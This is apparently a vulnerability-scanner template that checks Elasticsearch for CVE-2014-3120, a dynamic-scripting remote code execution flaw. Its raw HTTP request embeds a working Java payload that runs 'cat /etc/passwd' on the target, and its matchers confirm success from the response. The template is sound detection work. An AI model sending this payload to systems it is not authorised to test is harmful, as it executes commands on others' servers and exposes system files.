id: CVE-2014-3120 info: name: ElasticSearch v1.1.1/1.2 RCE author: pikpikcu severity: critical description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - https://www.elastic.co/blog/logstash-1-4-3-released - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://bouk.co/blog/elasticsearch-rce/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 cve-id: CVE-2014-3120 tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic metadata: max-request: 1 http: - raw: - | POST /_search?pretty HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded { "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } } matchers-condition: and matchers: - type: word words: - "application/json" part: header - type: regex regex: - "root:.*:0:0:" part: body - type: status status: - 200